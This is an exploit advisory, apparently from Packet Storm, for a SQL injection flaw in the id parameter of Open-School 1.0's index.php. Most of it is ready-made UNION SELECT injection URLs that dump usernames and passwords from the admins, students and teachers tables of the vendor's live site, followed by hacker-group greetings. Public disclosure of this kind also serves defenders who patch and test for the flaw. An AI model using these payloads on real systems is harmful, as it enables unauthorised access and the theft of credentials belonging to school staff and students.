Open-School version 1.0 suffers from a remote SQL injection vulnerability.
a6f321cdec73b204e974138089e966d7ee18d694f8546feff68d04a788245ee6Cms : Open-school
Version : 1.0
Archivo : Index.php
Parametro : id
Sitio :http://open-school.org
Url Vulnz :http://site.com/index.php?module=os_news&view=show&id=[SQLI]
Demo Injection:
Admin (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+admins
Students (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+students
Teachers (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+teachers
Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed